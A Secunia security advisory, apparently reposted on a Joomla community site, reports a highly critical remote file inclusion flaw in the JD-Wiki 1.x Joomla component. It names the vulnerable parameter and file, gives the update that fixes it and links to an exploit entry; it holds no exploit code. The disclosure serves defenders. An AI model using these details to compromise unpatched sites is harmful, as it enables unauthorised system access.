SECUNIA ADVISORY ID: SA21389 VERIFY ADVISORY: http://secunia.com/advisories/21389/ CRITICAL: Highly critical IMPACT: System access WHERE: >From remote SOFTWARE: JD-Wiki 1.x (component for Joomla) http://secunia.com/product/11256/ DESCRIPTION: jank0 has reported a vulnerability in the JD-Wiki component for Joomla, which can be exploited by malicious people to compromise a vulnerable system. Input passed to the "mosConfig_absolute_path" parameter in components/com_jd-wiki/lib/tpl/default/main.php isn't properly verified, before it is used to include files. This can be exploited to include arbitrary files from external and local resources. Successful exploitation requires that "register_globals" is enabled. SOLUTION: Update to version 1.0.3: http://forge.joomla.org/sf/frs/do/downloadFile/projects.joomladeveloping/frs.joomla_1_0_x.components/frs6415?dl=1 PROVIDED AND/OR DISCOVERED BY: jank0 ORIGINAL ADVISORY: http://www.joomladeveloping.org/component/option,com_jd-wp/Itemid,29/p,33/ http://milw0rm.com/exploits/2125
DOWNLOAD
JOOMLA!
OUR NETWORK
Joomla Extensions, Joomla Templates
Joomla!® User Group Thailand
รับทำเว็บ Joomla, อบรบ Joomla
